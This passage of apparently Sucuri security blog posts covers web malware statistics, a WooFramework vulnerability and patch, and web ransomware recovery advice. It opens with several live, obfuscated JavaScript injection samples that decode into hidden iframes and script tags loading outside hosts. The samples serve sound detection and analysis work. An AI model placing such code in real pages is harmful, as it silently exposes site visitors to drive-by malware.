54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~5
0~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~2
9.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57
~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5
0~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~5
1.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~
54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~
54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~5
9.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49
~19~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=56
3;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</scr
ipt>
    556 <script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{
Number()["pr"+"ot"+"ot"+"ype"].q}catch(egewgsd){if(window.document)f=[
"-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60
k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k0k
82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k6
7k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60
k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k71k64
k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-2k-9k78k64k5
9k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k67k
60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k7
4k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k
70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-
28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-28
k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73k6
0k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k7
4k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k
17k6k6k71k64k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-
2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k64
k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k-2
k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2
k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24
k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5
k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2k8
k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60
k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7
k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84"][0].
split("k");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;567
!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(
s);</script>
    544 <script>var _0x8ab7=["\x31\x34\x36\x2E\x31\x38\x35\x2E\x32\x35
\x34\x2E\x32\x34\x35","\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x3
1\x30\x33","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x31\x34\x38",
"\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x34\x39","\x73\x63\x72\x
69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x
73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F","\x2F\x73\x2E\x70\x68\x70",
"\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x
79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\
x6C\x64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];fo
r(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7
[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=document[_0x8ab7[10]](_
0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>
    486 <script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)
try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i
1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i
63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-
30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70
i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62i78i8
i60i72i78i71i77i12i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i6
6i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72
i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i7
5i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i
71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22
i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1
i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1
i0i76i75i60i0i5i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62i78i8i60
i72i78i71i77i12i7i73i65i73i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59
i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i7
2i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69
i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i
20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i1
0i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65
i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i
77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i
0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i8
6"][0].split("i");md="a";v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=Stri
ng;for(;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;
e(z);</script>
    424 <script>c=2;i=c-2;if(window.document)try{new c.prototype}catch
(hgberger){f=["-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n3
1n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n
53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n
87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n7
6n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9
n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n-6n81
n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n8
3n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n
73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n2
1n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29
n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85
n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n
76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n
77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n
9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n3n21
n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n
63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77
n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64
n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67
n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78
n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29
n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28
n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72
n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87"][0].split("n");md="a";e=w
indow["e"+"val"];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r.fromChar
Code(38+1*w[j]);}e(s);}</script>
    405 <script>i=0;try{prototype;}catch(egewgsd){f=["-32b-32b64b61b-9
b-1b59b70b58b76b68b60b69b75b5b62b60b75b28b67b60b68b60b69b75b74b25b80b4
3b56b62b37b56b68b60b-1b-2b57b70b59b80b-2b0b50b7b52b0b82b-28b-32b-32b-3
2b64b61b73b56b68b60b73b-1b0b18b-28b-32b-32b84b-9b60b67b74b60b-9b82b-28
b-32b-32b-32b59b70b58b76b68b60b69b75b5b78b73b64b75b60b-1b-7b19b64b61b7
3b56b68b60b-9b74b73b58b20b-2b63b75b75b71b17b6b6b57b80b67b77b64b63b56b5
b73b76b6b58b70b76b69b75b8b15b5b71b63b71b-2b-9b78b64b59b75b63b20b-2b8b7
b-2b-9b63b60b64b62b63b75b20b-2b8b7b-2b-9b74b75b80b67b60b20b-2b77b64b74
b64b57b64b67b64b75b80b17b63b64b59b59b60b69b18b71b70b74b64b75b64b70b69b
17b56b57b74b70b67b76b75b60b18b67b60b61b75b17b7b18b75b70b71b17b7b18b-2b
21b19b6b64b61b73b56b68b60b21b-7b0b18b-28b-32b-32b84b-28b-32b-32b61b76b
69b58b75b64b70b69b-9b64b61b73b56b68b60b73b-1b0b82b-28b-32b-32b-32b77b5
6b73b-9b61b-9b20b-9b59b70b58b76b68b60b69b75b5b58b73b60b56b75b60b28b67b
60b68b60b69b75b-1b-2b64b61b73b56b68b60b-2b0b18b61b5b74b60b75b24b75b75b
73b64b57b76b75b60b-1b-2b74b73b58b-2b3b-2b63b75b75b71b17b6b6b57b80b67b7
7b64b63b56b5b73b76b6b58b70b76b69b75b8b15b5b71b63b71b-2b0b18b61b5b74b75
b80b67b60b5b77b64b74b64b57b64b67b64b75b80b20b-2b63b64b59b59b60b69b-2b1
8b61b5b74b75b80b67b60b5b71b70b74b64b75b64b70b69b20b-2b56b57b74b70b67b7
6b75b60b-2b18b61b5b74b75b80b67b60b5b67b60b61b75b20b-2b7b-2b18b61b5b74b
75b80b67b60b5b75b70b71b20b-2b7b-2b18b61b5b74b60b75b24b75b75b73b64b57b7
6b75b60b-1b-2b78b64b59b75b63b-2b3b-2b8b7b-2b0b18b61b5b74b60b75b24b75b7
5b73b64b57b76b75b60b-1b-2b63b60b64b62b63b75b-2b3b-2b8b7b-2b0b18b-28b-3
2b-32b-32b59b70b58b76b68b60b69b75b5b62b60b75b28b67b60b68b60b69b75b74b2
5b80b43b56b62b37b56b68b60b-1b-2b57b70b59b80b-2b0b50b7b52b5b56b71b71b60
b69b59b26b63b64b67b59b-1b61b0b18b-28b-32b-32b84"][0].split("b");v="e"+
"va"+"l";}if(v)e=window[v];try{new 125;}catch(qwg){w=f;s=[];}r=String;
for(;567!=i;i+=1){j=i;if(e)s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1
+41);}if(e)e(s);</script>
    357 <script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{
Boolean()["pr"+"otot"+"ype"].q}catch(egewgsd){if(window.document)f=["-
32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i6
9i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82
i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i
74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-
1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i71i64i5
9i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i-9i78i64i59i
75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60
i20i-2i77i64i74i64i57i64i67i64i75i80i17i63i64i59i59i60i69i18i71i70i74i
64i75i64i70i69i17i56i57i74i70i67i76i75i60i18i67i60i61i75i17i7i18i75i70
i71i17i7i18i-2i21i19i6i64i61i73i56i68i60i21i-7i0i18i-28i-32i-32i84i-28
i-32i-32i61i76i69i58i75i64i70i69i-9i64i61i73i56i68i60i73i-1i0i82i-28i-
32i-32i-32i77i56i73i-9i61i-9i20i-9i59i70i58i76i68i60i69i75i5i58i73i60i
56i75i60i28i67i60i68i60i69i75i-1i-2i64i61i73i56i68i60i-2i0i18i61i5i74i
60i75i24i75i75i73i64i57i76i75i60i-1i-2i74i73i58i-2i3i-2i63i75i75i71i17
i6i6i71i64i59i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i
0i18i61i5i74i75i80i67i60i5i77i64i74i64i57i64i67i64i75i80i20i-2i63i64i5
9i59i60i69i-2i18i61i5i74i75i80i67i60i5i71i70i74i64i75i64i70i69i20i-2i5
6i57i74i70i67i76i75i60i-2i18i61i5i74i75i80i67i60i5i67i60i61i75i20i-2i7
i-2i18i61i5i74i75i80i67i60i5i75i70i71i20i-2i7i-2i18i61i5i74i60i75i24i7
5i75i73i64i57i76i75i60i-1i-2i78i64i59i75i63i-2i3i-2i8i7i-2i0i18i61i5i7
4i60i75i24i75i75i73i64i57i76i75i60i-1i-2i63i60i64i62i63i75i-2i3i-2i8i7
i-2i0i18i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i6
8i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i5
2i5i56i71i71i60i69i59i26i63i64i67i59i-1i61i0i18i-28i-32i-32i84"][0].sp
lit("i");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;567!=
i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(s)
;</script>

Malware signatures

Even though we can classify web malware into those 4 categories above, we sub-categorize them for our analysis and internal detection. Those were the top signatures detected (per page, not per site in this count):

39392 http://sucuri.net/malware/malware-entry-mwblacklisted35
27984 http://sucuri.net/malware/malware-entry-mwanomalysp8
27491 http://sucuri.net/malware/entry/MW:IFRAME:HD202
15393 http://sucuri.net/malware/malware-entry-mwjs67473
15280 http://sucuri.net/malware/web-site-disabled
13064 http://sucuri.net/malware/entry/MW:JS:DEPACK
12440 http://sucuri.net/malware/malware-entry-mwht291
10209 http://sucuri.net/malware/malware-entry-mwjsanon7
10005 http://sucuri.net/malware/entry/MW:SPAM:SEO
9746 http://sucuri.net/malware/malware-entry-mwiframeenc1603
7180 http://sucuri.net/malware/malware-entry-mwiframehd564
6863 http://sucuri.net/malware/malware-entry-mwjs160
6597 http://sucuri.net/malware/malware-entry-mwhjck3123
6060 http://sucuri.net/malware/malware-entry-mwjs69693
3449 http://sucuri.net/malware/malware-entry-mwjsde921
3123 http://sucuri.net/malware/malware-entry-mwhta7
2138 http://sucuri.net/malware/malware-entry-mwjs2368
1438 http://sucuri.net/malware/entry/MW:JS:150
1275 http://sucuri.net/malware/malware-entry-mwjs488
1208 http://sucuri.net/malware/entry/MW:DEFACED:01
1061 http://sucuri.net/malware/malware-entry-mwgdd6
800 http://sucuri.net/malware/entry/MW:JS:221
780 http://sucuri.net/malware/malware-entry-mwanomalysp7
532 http://sucuri.net/malware/malware-entry-mwjsjj678
367 http://sucuri.net/malware/malware-entry-mwjs159

At this time this does not appear to be linked to the DDoS they experienced this week.

We are currently assessing the severity of this vulnerability in our labs. If in fact we find that something severely adverse can be performed with it, the next big concern will be that it can be exploited even if the theme is not active.

Quick tip: If your themes or plugins aren’t in use, get rid of them!

The Patch

The WooThemes team responded to the post showing that the bug had been found and fixed on 04/23/2012. The challenge with this appears to be that patching the bug also appeared to negatively impact the updater so some might not have been notified of the issue.

The WooThemes team responded this morning informing everyone of the vulnerability and its patch. Matty Cohen is quoted saying:

The shortcode preview functionality that was in the WooFramework’s bundled shortcode generator (the neat popup used to add shortcodes to posts and pages with a point-and-click interface) was identified as a potential security exploit several days ago. After the first report was made, we began work on isolating and resolving this exploit. This resulted in the removal of this functionality from the WooFramework (the shortcode generator is still there… just the preview functionality was removed).

The potential exploit is such that the shortcode preview allowed users to generate shortcodes using the preview window’s file, without authenticating the user.

The Area of Concern

The bigger issue appears to be the following:

1. The disclosure of this vulnerability, and what appears to be little regard to “responsible disclosure”.
2. The lack of disclosure from the company if in fact it was patched April 23rd.
3. Getting the word out to all the end-users using the theme or that have it on their servers sitting idle.

This is easily a chicken before the egg scenario. If in fact the vulnerability was found and patched on April 23rd then a public disclosure was and is warranted, especially when we’re talking about the number of end-users using the WooThemes framework. That being said, Jason Gill also had the social responsibility to disclose responsibly to the company. This could easily be perceived as something a grey-hat would do.

The Real Problem

The real problem right now is that the information is in the wild. Again, it comes down the simplest of security practices, update your software immediately.

Version 5.3.11 of the WooFramework is working fully with the automatic “Update Framework” link as well. This was just a matter of a slightly older version being online after our website restoration, which was why the automated updater wasn’t being triggered. We’ve now remedied this with version 5.3.11. – WooThemes

Our focus now has to be getting ahead of the attack and reducing the attack landscape.

Please, be sure to review your server and update or remove any old themes not being used.

Thought of the day: Let’s all use this opportunity to grow from it as a community and learn to better engage with each other.

If you have any further questions please contact us at info@sucuri.net

The idea came from a case this week where a client was defaced. Instead of engaging the host or malware professional she took it upon herself to to plead with the attacker via the provided email (you have to love egos). What was most amusing though was the attacker finally gave in and restored her site in an attempt to get her off his back.

Obviously not something we recommend, but an amusing story none the less. She turned his defacement and retaliated with a little something we like to call, “Begware.”

And so this got us thinking about something that has predominantly been isolated to the notebook and desktop environments – Ransomware malware.

What is Ransomware Malware?

Its a type of malware designed to hijack a victims information, often isolated to local environments, in return for money or some other collateral. It actually made its debut back in 1989 in a trojan called PC Cyborg.

The idea is simple, keep you from your data.

Imagine one day turning on your computer and in return you see a splash page that provides you instructions on how to go about retrieving your information. To retrieve it though you must pay the attacker X amount of dollars and in return you will get a key that will undo anything that was done to keep you from your data.

Ransomware and the Web

So the obvious question, being that we’re a web malware company is, is it a trend we’re seeing on the web? The answer is no, but a definite possibility.

Thinking Through It

What would you do if you opened your site one day and it had an ugly defacement on it, something like this:

Instead of being informed of the weakness in your websites security and their obvious superiority, you get a message that says:

We have stolen your website, send money via PayPal to this account and we’ll reinstate your site!!!

For a more impactful affect imagine the use of other more imaginative words to bring the point home.

What would you do?

The harsh reality of the situation is that some folks would most likely comply with such demands. That is probably the part that worries us the most, not those that would see this and laugh, but rather those that would see this and comply.

What To Do

If ever presented with something like this, don’t fret. The web-o-sphere is a different animal than local environments. There is no one piece of the puzzle that can be kicked out from under you, as long as you are being proactive.

The key word being – proactive.

Understand that you and only you are responsible for your website. Its easy to pass the buck off to someone else, your developer, designer, host, malware company but in the end, its your site. Take ownership!

So here is a list of what to do:

1. Take a step back, collect yourself, and breathe
2. Call your hosting company
3. Have them apply your backups – You have backups right?
4. Change all your credentials – FTP, SFTP, SSH, Admin Panel, CPANEL, Database, etc..
5. Engage with a malware company

If you are a proactive website owner then you would have done your homework and you would have:

1. Host contact information in the event of emergencies
2. Understanding of host protocols when it comes to malware
3. Backups going back at least 1 week of your database and website

Looking Forward

While not currently an active web-based threat it was good to take a minute to stop and think about it. To think about what someone would do if it ever happened and how it could be applied is fundamental to how we do business.Additionally, with the evolution and increased sophistication of web-based malware we would not be surprised to see it.

Fortunately, as in most cases, by taking a few proactive steps, a website owner is able to keep themselves from becoming a victim.

If you have seen cases of this or experienced it yourself we would love to hear from you, send us a note at info@sucuri.net

Dre Armeda from Sucuri Security presented on various WordPress related areas that help reduce risk for website owners and administrators. The webinar includes a high level discussion about the growth of the internet, he goes over some of the more popular malware attacks affecting WordPress users, then offers various tips, tools, and resources to help you reduce risk.

Hope you enjoy!

If you have any questions, feel free to email us at info@sucuri.net